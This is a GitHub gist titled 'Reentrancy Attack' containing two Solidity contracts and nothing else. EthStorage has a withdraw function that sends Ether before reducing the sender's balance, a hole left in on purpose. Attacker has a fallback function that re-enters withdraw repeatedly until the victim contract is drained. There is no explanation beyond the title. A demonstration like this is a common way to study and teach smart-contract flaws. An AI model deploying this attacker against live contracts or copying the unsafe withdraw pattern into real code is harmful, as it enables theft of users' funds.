Created
February 14, 2019 17:18
-
-
Save stupeters187/449410980baacf571e56c0d9520ce194 to your computer and use it in GitHub Desktop.
Reentrancy Attack
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| pragma solidity ^0.5.0; | |
| contract EthStorage { | |
| uint maxWithdrawl = 1 ether; | |
| mapping(address => uint) public balances; | |
| function deposit() public payable { | |
| balances[msg.sender] += msg.value; | |
| } | |
| function withdraw(uint _withdrawalAmount) public { | |
| require(balances[msg.sender] >= _withdrawalAmount); | |
| msg.sender.call.value(_withdrawalAmount)(""); | |
| balances[msg.sender] -= _withdrawalAmount; | |
| } | |
| function getBalance() public view returns (uint) { | |
| return address(this).balance; | |
| } | |
| } | |
| contract Attacker { | |
| EthStorage public ethStorage; | |
| constructor(address _ethStorage) payable public { | |
| ethStorage = EthStorage(_ethStorage); | |
| } | |
| function attackEthStorage() payable public { | |
| require(msg.value == 1 ether); | |
| ethStorage.deposit.value(1 ether)(); | |
| ethStorage.withdraw(1 ether); | |
| } | |
| function() payable external { | |
| if(address(ethStorage).balance >= 1 ether){ | |
| ethStorage.withdraw(1 ether); | |
| } | |
| } | |
| function getBalance() public view returns (uint) { | |
| return address(this).balance; | |
| } | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment